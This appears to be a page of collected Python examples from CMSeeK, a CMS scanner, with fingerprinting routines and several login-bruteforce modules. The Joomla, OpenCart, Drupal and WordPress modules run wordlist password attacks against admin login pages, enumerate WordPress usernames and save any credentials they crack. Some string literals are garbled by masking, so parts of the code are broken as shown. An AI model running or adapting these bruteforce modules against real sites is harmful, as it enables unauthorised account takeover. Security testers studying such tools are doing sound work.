Exemplo n.º 1
0
def start():
    cmseek.clearscreen()
    cmseek.banner("Joomla Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Joomla")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'joom':
            joomcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'joom':
                joomcnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                if try3[0] == '1' and try3[1] == 'joom':
                    drucnf = '1'
                else:
                    drucnf = '0'
    if joomcnf != '1':
        cmseek.error('Could not confirm Joomla... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "Joomla Confirmed... Confirming form and getting token...")
        joomloginsrc = cmseek.getsource(url + '/administrator/index.php',
                                        cmseek.randomua('thatsprettygay'))
        if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]:
            # joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1])
            # if len(joomtoken) == 0:
            #    cmseek.error('Unable to get token... CMSeek is quitting!')
            #    cmseek.handle_quit()
            # cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln)
            # token = joomtoken[0]
            joomparamuser = []
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                joomparamuser.append(rusr)
            joombruteusers = set(
                joomparamuser
            )  ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well
            for user in joombruteusers:
                passfound = '0'
                print('\n')
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                for password in passwords:
                    if password != '' and password != '\n':
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        # print("Testing Pass: "******"Ret URL: " + str(cursrc[3]))
                        if 'logout' in str(cursrc[1]):
                            print('\n')
                            cmseek.success('Password found!')
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            cmseek.savebrute(url,
                                             url + '/administrator/index.php',
                                             user, password)
                            passfound = '1'
                            break
                        else:
                            continue
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 2
0
def main_proc(site, cua):
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")
    init_source = cmseek.getsource(site, cua)
    if init_source[0] != '1':
        cmseek.error(
            "Aborting CMSeek! Couldn't connect to site \n    Error: %s" %
            init_source[1])
        return
    else:
        scode = init_source[1]
        headers = init_source[2]
        if site != init_source[3] and site + '/' != init_source[3]:
            cmseek.info('Target redirected to: ' + cmseek.bold +
                        cmseek.fgreen + init_source[3] + cmseek.cln)
            follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen +
                                 init_source[3] + cmseek.cln +
                                 ' as target? (y/n): ')
            if follow_redir.lower() == 'y':
                site = init_source[3]
    if scode == '':
        # silly little check thought it'd come handy
        cmseek.error('Aborting detection, source code empty')
        return

    cmseek.statement("Detection Started")

    ## init variables
    cms = ''  # the cms id if detected
    cms_detected = '0'  # self explanotory
    detection_method = ''  # ^
    ga = '0'  # is generator available
    if 'generator' in scode or 'Generator' in scode:
        ga = '1'

    cmseek.statement("Using headers to detect CMS (Stage 1 of 3)")
    header_detection = header.check(headers)
    if header_detection[0] == '1':
        detection_method = 'header'
        cms = header_detection[1]
        cms_detected = '1'
    if cms_detected == '0' and ga == '1':
        # cms detection via generator
        cmseek.statement(
            "Using Generator meta tag to detect CMS (Stage 2 of 3)")
        gen_detection = source.generator(scode)
        if gen_detection[0] == '1':
            detection_method = 'generator'
            cms = gen_detection[1]
            cms_detected = '1'
    else:
        # Check cms using source code
        cmseek.statement("Using source code to detect CMS (Stage 3 of 3)")
        source_check = source.check(scode, site)
        if source_check[0] == '1':
            detection_method = 'source'
            cms = source_check[1]
            cms_detected = '1'

    if cms_detected == '1':
        cmseek.success('CMS Detected, CMS ID: ' + cmseek.bold + cms +
                       cmseek.cln + ', Detection method: ' + cmseek.bold +
                       detection_method + cmseek.cln)
        cmseek.update_log('detection_param', detection_method)
        cmseek.update_log('cms_id', cms)  # update log
        cmseek.statement('Getting CMS info from databse')
        cms_info = getattr(cmsdb, cms)
        if cms_info['deeps'] == '1':
            # cmseek.success('Starting ' + cmseek.bold + cms_info['name'] + ' deep scan' + cmseek.cln)
            advanced.start(cms, site, cua, ga, scode)
            return
        elif cms_info['vd'] == '1':
            cmseek.success('Version detection available')
            cms_version = version_detect.start(cms, site, cua, ga, scode)
            cmseek.clearscreen()
            cmseek.banner("CMS Scan Results")
            cmseek.result('Target: ', site)
            cmseek.result("Detected CMS: ", cms_info['name'])
            cmseek.update_log('cms_name', cms_info['name'])  # update log
            if cms_version != '0':
                cmseek.result("CMS Version: ", cms_version)
                cmseek.update_log('cms_version', cms_version)  # update log
            cmseek.result("CMS URL: ", cms_info['url'])
            cmseek.update_log('cms_url', cms_info['url'])  # update log
            return
        else:
            # nor version detect neither DeepScan available
            cmseek.clearscreen()
            cmseek.banner("CMS Scan Results")
            cmseek.result('Target: ', site)
            cmseek.result("Detected CMS: ", cms_info['name'])
            cmseek.update_log('cms_name', cms_info['name'])  # update log
            cmseek.result("CMS URL: ", cms_info['url'])
            cmseek.update_log('cms_url', cms_info['url'])  # update log
            return
    else:
        print('\n')
        cmseek.error(
            'CMS Detection failed, if you know the cms please help me improve CMSeeK by reporting the cms along with the target by creating an issue'
        )
        print('''
{2}Create issue:{3} https://github.com/Tuhinshubhra/CMSeeK/issues/new

{4}Title:{5} [SUGGESTION] CMS detction failed!
{6}Content:{7}
    - CMSeeK Version: {0}
    - Target: {1}
    - Probable CMS: <name and/or cms url>

N.B: Create issue only if you are sure, please avoid spamming!
        '''.format(cmseek.cmseek_version, site, cmseek.bold, cmseek.cln,
                   cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln))
        return
    return
Exemplo n.º 3
0
def start():
    cmseek.clearscreen()
    cmseek.banner("OpenCart Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for OpenCart")
    bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'oc':
            occnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'oc':
                occnf = '1'
            else:
                occnf = '0'
    if occnf != '1':
        cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "OpenCart Confirmed... Checking for OpenCart login form")
        ocloginsrc = cmseek.getsource(url + '/admin/index.php',
                                      cmseek.randomua('thatsprettygay'))
        if ocloginsrc[0] == '1' and '<form' in ocloginsrc[
                1] and 'route=common/login' in ocloginsrc[1]:
            cmseek.success("Login form found!")
            ocparamuser = ['']
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                ocparamuser.append(rusr)
            ocbruteusers = set(ocparamuser)  ## Strip duplicate usernames

            for user in ocbruteusers:
                if user != '':
                    passfound = '0'
                    print('\n')
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    for password in passwords:
                        if password != '' and password != '\n':
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password)
                            if 'route=common/dashboard&user_token=' in str(
                                    cursrc[3]):
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url, url + '/admin/index.php',
                                                 user, password)
                                passfound = '1'
                                break
                            else:
                                continue
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 4
0
def main_proc(site,cua):
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")
    init_source = cmseek.getsource(site, cua)
    if init_source[0] != '1':
        cmseek.error("Aborting CMSeek! Couldn't connect to site \n    Error: %s" % init_source[1])
        return
    else:
        scode = init_source[1]
        headers = init_source[2]
        if site != init_source[3] and site + '/' != init_source[3]:
            cmseek.info('Target redirected to: ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln)
            follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln + ' as target? (y/n): ')
            if follow_redir.lower() == 'y':
                site = init_source[3]
    cmseek.statement("Detection Started")
    cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
    c1 = header.check(headers)
    if c1[0] == "1":
        # Do this shit later
        cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c1[1])
        cmseek.update_log('detection_param','header') # update log
        cmseek.update_log('cms_id',c1[1]) # update log
        cka = getattr(cmsdb, c1[1])
        if cka['deeps'] != '1': # Deep Scan
            if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
                print('\n')
                cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                cmseek.update_log('cms_name',cka['name']) # update log
                cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                cmseek.update_log('cms_url',cka['url']) # update log
            else:
                cmseek.statement("CMS Version is detectable, detecting CMS Version")
                ### Detect version
                cms_version = version_detect.start(c1[1], site, cua, '1', scode)
                print('\n')
                cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                cmseek.update_log('cms_name',cka['name']) # update log
                if cms_version != '0':
                    cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
                    cmseek.update_log('cms_version',cms_version) # update log
                cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                cmseek.update_log('cms_url',cka['url']) # update log
            # return
        else:
            advanced.start(c1[1], site, cua, '2', scode) ## The 2 suggests that generator check has not been performed
    else:
        cmseek.warning('No luck with headers... Continuing with source code')
        cmseek.statement("Checking for generator meta tag in source code")
        if 'Generator' in scode or 'generator' in scode:
            cmseek.success("Generator meta tag found.. Continuing with detection (2.1 of 2.2)")
            ga = "1" ## Generator tag found .. this will come in handy later to save us some milliseconds ;)
            c21 = source.generator(scode)
            if c21[0] == '1':
                cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c21[1])
                cmseek.update_log('detection_param','generator') # update log
                cmseek.update_log('cms_id',c21[1]) # update log
                cka = getattr(cmsdb, c21[1])
                if cka['deeps'] != '1': # Deep Scan not available
                    if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
                        print('\n')
                        cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',cka['name']) # update log
                        cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url',cka['url']) # update log
                    else:
                        cmseek.statement("CMS Version is detectable, detecting CMS Version")
                        ### Detect version
                        cms_version = version_detect.start(c21[1], site, cua, '1', scode)
                        print('\n')
                        cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',cka['name']) # update log
                        if cms_version != '0':
                            cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
                            cmseek.update_log('cms_version',cms_version) # update log
                        cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url',cka['url']) # update log
                    # return
                else:
                    advanced.start(c21[1], site, cua, '1', scode)
            elif c21[0] == '2': # Empty Source code
                cmseek.error("Source code was empty... exiting CMSeek")
                # return
            else: ## CMS Detection unsuccessful via generator meta tag
                cmseek.warning('Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)')
                c22 = source.check(scode, site)
                if c22[0] == '1':
                    cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c22[1])
                    cmseek.update_log('detection_param','source') # update log
                    cmseek.update_log('cms_id',c22[1]) # update log
                    cka = getattr(cmsdb, c22[1])
                    if cka['deeps'] != '1': # Deep Scan not available
                        if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
                            print('\n')
                            cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                            cmseek.update_log('cms_name',cka['name']) # update log
                            cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                            cmseek.update_log('cms_url',cka['url']) # update log
                        else:
                            cmseek.statement("CMS Version is detectable, detecting CMS Version")
                            cms_version = version_detect.start(c22[1], site, cua, '1', scode)
                            ### Detect version
                            print('\n')
                            cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                            cmseek.update_log('cms_name',cka['name']) # update log
                            if cms_version != '0':
                                cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
                                cmseek.update_log('cms_version',cms_version) # update log
                            cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                            cmseek.update_log('cms_url',cka['url']) # update log
                        return
                    else:
                        advanced.start(c22[1], site, cua, '1', scode)
                elif c22[0] == '2': # Empty Source code
                    cmseek.error("Source code was empty... exiting CMSeek")
                    return
                else:
                    cmseek.error("Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n")
                    return
        else:
            cmseek.warning("Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)")
            ga = '0' ## Generator meta tag not found as i freakin said earlier this will come in handy later
            c22 = source.check(scode, site)
            if c22[0] == '1':
                cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c22[1])
                cmseek.update_log('detection_param','source') # update log
                cmseek.update_log('cms_id',c22[1]) # update log
                cka = getattr(cmsdb, c22[1])
                if cka['deeps'] != '1': # Deep Scan not available
                    if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
                        print('\n')
                        cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',cka['name']) # update log
                        cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url',cka['url']) # update log
                    else:
                        cmseek.statement("CMS Version is detectable, detecting CMS Version")
                        cms_version = version_detect.start(c22[1], site, cua, '0', scode)
                        ### Detect version
                        print('\n')
                        cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',cka['name']) # update log
                        if cms_version != '0':
                            cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
                            cmseek.update_log('cms_version',cms_version) # update log
                        cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url',cka['url']) # update log
                    return
                else:
                    advanced.start(c22[1], site, cua, '0', scode)
            elif c22[0] == '2': # Empty Source code
                cmseek.error("Source code was empty... exiting CMSeek")
                return
            else:
                cmseek.error("Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n")
                return
Exemplo n.º 5
0
def main_proc(site, cua):
    cmseek.clearscreen()
    cmseek.banner("CMS Detection And Deep Scan")
    cmseek.info("Scanning Site: " + site)
    cmseek.statement("User Agent: " + cua)
    cmseek.statement("Collecting Headers and Page Source for Analysis")
    try:
        ckreq = urllib.request.Request(site,
                                       data=None,
                                       headers={'User-Agent': cua})
        with urllib.request.urlopen(ckreq) as response:
            scode = response.read().decode()
            headers = str(response.info())
    except Exception as e:
        e = str(e)
        cmseek.error(
            "Aborting CMSeek! Couldn't connect to site \n    Error: %s" %
            e)  #TODO: remove the error msg later if possible
        return
    # TODO: The source code enumartion > save to site directory > print done

    cmseek.statement("Detection Started")
    cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
    c1 = header.check(headers)
    if c1[0] == "1":
        # Do this shit later
        cmseek.success(
            "CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
            % c1[1])
        cmseek.update_log('detection_param', 'header')  # update log
        cmseek.update_log('cms_id', c1[1])  # update log
        cka = getattr(cmsdb, c1[1])
        if cka['deeps'] != '1':  # Deep Scan
            if cka['vd'] != '1':  # Version Detection not available for the cms show basic stuff
                print('\n')
                cmseek.result(
                    '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                    cka['name'] + cmseek.cln)
                cmseek.update_log('cms_name', cka['name'])  # update log
                cmseek.result(
                    '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                    cka['url'] + cmseek.cln)
                cmseek.update_log('cms_url', cka['url'])  # update log
            else:
                cmseek.statement(
                    "CMS Version is detectable, detecting CMS Version")
                ### Detect version
                print('\n')
                cmseek.result(
                    '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                    cka['name'] + cmseek.cln)
                cmseek.update_log('cms_name', cka['name'])  # update log
                cmseek.result(
                    '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                    cka['url'] + cmseek.cln)
                cmseek.update_log('cms_url', cka['url'])  # update log
            # return
        else:
            advanced.deep(
                c1[1], site, cua, '2', scode
            )  ## The 2 suggests that generator check has not been performed
    else:
        cmseek.warning('No luck with headers... Continuing with source code')
        cmseek.statement("Checking for generator meta tag in source code")
        if 'Generator' in scode or 'generator' in scode:
            cmseek.success(
                "Generator meta tag found.. Continuing with detection (2.1 of 2.2)"
            )
            ga = "1"  ## Generator tag found .. this will come in handy later to save us some milliseconds ;)
            c21 = source.generator(scode)
            if c21[0] == '1':
                cmseek.success(
                    "CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
                    % c21[1])
                cmseek.update_log('detection_param', 'generator')  # update log
                cmseek.update_log('cms_id', c21[1])  # update log
                cka = getattr(cmsdb, c21[1])
                if cka['deeps'] != '1':  # Deep Scan not available
                    if cka['vd'] != '1':  # Version Detection not available for the cms show basic stuff
                        print('\n')
                        cmseek.result(
                            '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                            cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',
                                          cka['name'])  # update log
                        cmseek.result(
                            '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                            cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url', cka['url'])  # update log
                    else:
                        cmseek.statement(
                            "CMS Version is detectable, detecting CMS Version")
                        ### Detect version
                        print('\n')
                        cmseek.result(
                            '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                            cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',
                                          cka['name'])  # update log
                        cmseek.result(
                            '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                            cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url', cka['url'])  # update log
                    # return
                else:
                    advanced.deep(c21[1], site, cua, '1', scode)
            elif c21[0] == '2':  # Empty Source code
                cmseek.error("Source code was empty... exiting CMSeek")
                # return
            else:  ## CMS Detection unsuccessful via generator meta tag
                cmseek.warning(
                    'Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)'
                )
                c22 = source.check(scode, site)
                if c22[0] == '1':
                    cmseek.success(
                        "CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
                        % c22[1])
                    cmseek.update_log('detection_param',
                                      'source')  # update log
                    cmseek.update_log('cms_id', c22[1])  # update log
                    cka = getattr(cmsdb, c22[1])
                    if cka['deeps'] != '1':  # Deep Scan not available
                        if cka['vd'] != '1':  # Version Detection not available for the cms show basic stuff
                            print('\n')
                            cmseek.result(
                                '', "CMS Name: " + cmseek.bold +
                                cmseek.fgreen + cka['name'] + cmseek.cln)
                            cmseek.update_log('cms_name',
                                              cka['name'])  # update log
                            cmseek.result(
                                '', "CMS Link: " + cmseek.bold +
                                cmseek.fgreen + cka['url'] + cmseek.cln)
                            cmseek.update_log('cms_url',
                                              cka['url'])  # update log
                        else:
                            cmseek.statement(
                                "CMS Version is detectable, detecting CMS Version"
                            )
                            ### Detect version
                            print('\n')
                            cmseek.result(
                                '', "CMS Name: " + cmseek.bold +
                                cmseek.fgreen + cka['name'] + cmseek.cln)
                            cmseek.update_log('cms_name',
                                              cka['name'])  # update log
                            cmseek.result(
                                '', "CMS Link: " + cmseek.bold +
                                cmseek.fgreen + cka['url'] + cmseek.cln)
                            cmseek.update_log('cms_url',
                                              cka['url'])  # update log
                        return
                    else:
                        advanced.deep(c22[1], site, cua, '1', scode)
                elif c22[0] == '2':  # Empty Source code
                    cmseek.error("Source code was empty... exiting CMSeek")
                    return
                else:
                    cmseek.error(
                        "Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n"
                    )
                    return
        else:
            cmseek.warning(
                "Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)"
            )
            ga = '0'  ## Generator meta tag not found as i freakin said earlier this will come in handy later
            c22 = source.check(scode, site)
            if c22[0] == '1':
                cmseek.success(
                    "CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
                    % c22[1])
                cmseek.update_log('detection_param', 'source')  # update log
                cmseek.update_log('cms_id', c22[1])  # update log
                cka = getattr(cmsdb, c22[1])
                if cka['deeps'] != '1':  # Deep Scan not available
                    if cka['vd'] != '1':  # Version Detection not available for the cms show basic stuff
                        print('\n')
                        cmseek.result(
                            '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                            cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',
                                          cka['name'])  # update log
                        cmseek.result(
                            '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                            cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url', cka['url'])  # update log
                    else:
                        cmseek.statement(
                            "CMS Version is detectable, detecting CMS Version")
                        ### Detect version
                        print('\n')
                        cmseek.result(
                            '', "CMS Name: " + cmseek.bold + cmseek.fgreen +
                            cka['name'] + cmseek.cln)
                        cmseek.update_log('cms_name',
                                          cka['name'])  # update log
                        cmseek.result(
                            '', "CMS Link: " + cmseek.bold + cmseek.fgreen +
                            cka['url'] + cmseek.cln)
                        cmseek.update_log('cms_url', cka['url'])  # update log
                    return
                else:
                    advanced.deep(c22[1], site, cua, '0', scode)
            elif c22[0] == '2':  # Empty Source code
                cmseek.error("Source code was empty... exiting CMSeek")
                return
            else:
                cmseek.error(
                    "Couldn't detect cms... :( \n    Sorry master didn't mean to dissapoint but bye for now \n    Can't handle this much disappintment \n\n"
                )
                return
Exemplo n.º 6
0
def start():
    cmseek.clearscreen()
    cmseek.banner("Drupal Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for Drupal")
    bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime'))
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])  # Confirming Drupal using generator
        if try1[0] == '1' and try1[1] == 'dru':
            drucnf = '1'
        else:
            try2 = source.check(
                bsrc[1],
                url)  # Confirming Drupal using other source code checks
            if try2[0] == '1' and try2[1] == 'dru':
                drucnf = '1'
            else:
                try3 = header.check(bsrc[2])  # Headers Check!
                if try3[0] == '1' and try3[1] == 'dru':
                    drucnf = '1'
                else:
                    drucnf = '0'
    if drucnf != '1':
        cmseek.error('Could not confirm Drupal... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success("Drupal Confirmed... Checking for Drupal login form")
        druloginsrc = cmseek.getsource(
            url + '/user/login/',
            cmseek.randomua('therelivedaguynamedkakashi'))
        if druloginsrc[0] == '1' and '<form' in druloginsrc[
                1] and 'name="form_id" value="' in druloginsrc[1]:
            cmseek.success("Login form found! Retriving form id value")
            fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1])
            if fid == []:
                cmseek.error("Could not find form_id, CMSeeK is quitting!")
                cmseek.handle_quit()
            else:
                cmseek.success('form_id found: ' + cmseek.bold + fid[0] +
                               cmseek.cln)
                form_id = fid[0]
            druparamuser = ['']
            rawuser = input(
                "[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
            ).split(',')
            for rusr in rawuser:
                druparamuser.append(rusr)
            drubruteusers = set(druparamuser)  ## Strip duplicate usernames

            for user in drubruteusers:
                if user != '':
                    print('\n')
                    cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                    passwords = pwd_file.read().split('\n')
                    passfound = '0'
                    for password in passwords:
                        if password != '' and password != '\n':
                            sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                            sys.stdout.flush()
                            cursrc = testlogin(url, user, password, form_id)
                            # print(cursrc)
                            if '/user/login/' in str(cursrc):
                                continue
                            else:
                                cmseek.success('Password found! \n\n\n')
                                # print (cursrc)
                                cmseek.success('Password found!')
                                print(" |\n |--[username]--> " + cmseek.bold +
                                      user + cmseek.cln +
                                      "\n |\n |--[password]--> " +
                                      cmseek.bold + password + cmseek.cln +
                                      "\n |")
                                cmseek.success('Enjoy The Hunt!')
                                cmseek.savebrute(url, url + '/user/login',
                                                 user, password)
                                passfound = '1'
                                break
                            break
                    if passfound == '0':
                        cmseek.error('\n\nCould Not find Password!')
                    print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            cmseek.handle_quit()
Exemplo n.º 7
0
Arquivo: wp.py Projeto: zenzue/CMSeeK
def start():
    cmseek.clearscreen()
    cmseek.banner("WordPress Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for WordPress")
    bsrc = cmseek.getsource(
        url,
        cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
    if bsrc[0] != '1':
        # print(bsrc[1])
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
    else:
        try1 = source.generator(bsrc[1])
        if try1[0] == '1' and try1[1] == 'wp':
            wpcnf = '1'
        else:
            try2 = source.check(bsrc[1], url)
            if try2[0] == '1' and try2[1] == 'wp':
                wpcnf = '1'
            else:
                wpcnf = '0'
    if wpcnf != '1':
        print(bsrc[1])
        cmseek.error('Could not confirm WordPress... CMSeek is quitting')
        cmseek.handle_quit()
    else:
        cmseek.success(
            "WordPress Confirmed... Checking for WordPress login form")
        wploginsrc = cmseek.getsource(url + '/wp-login.php',
                                      cmseek.randomua('thatsprettygay'))
        if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
            cmseek.success(
                "Login form found.. Detecting Username For Bruteforce")
            wpparamuser = []
            uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0',
                                       bsrc[1])
            usernamesgen = uenum[0]
            wpparamuser = uenum[1]

            if wpparamuser == []:
                customuser = input(
                    "[~] CMSeek could not enumerate usernames, enter username if you know any: "
                )
                if customuser == "":
                    cmseek.error("No user found, CMSeek is quitting")
                else:
                    wpparamuser.append(customuser)
            wpbruteusers = set(wpparamuser)

            for user in wpbruteusers:
                passfound = '0'
                print('\n')
                cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
                passwords = pwd_file.read().split('\n')
                for password in passwords:
                    if password != '' and password != '\n':
                        sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
                        sys.stdout.flush()
                        cursrc = cmseek.wpbrutesrc(url, user, password)
                        if 'wp-admin' in str(cursrc[3]):
                            cmseek.success('Password found!')
                            print(" |\n |--[username]--> " + cmseek.bold +
                                  user + cmseek.cln +
                                  "\n |\n |--[password]--> " + cmseek.bold +
                                  password + cmseek.cln + "\n |")
                            cmseek.success('Enjoy The Hunt!')
                            cmseek.savebrute(url, url + '/wp-login.php', user,
                                             password)
                            passfound = '1'
                            break
                        else:
                            continue
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            # print(wploginsrc[1])
            cmseek.handle_quit()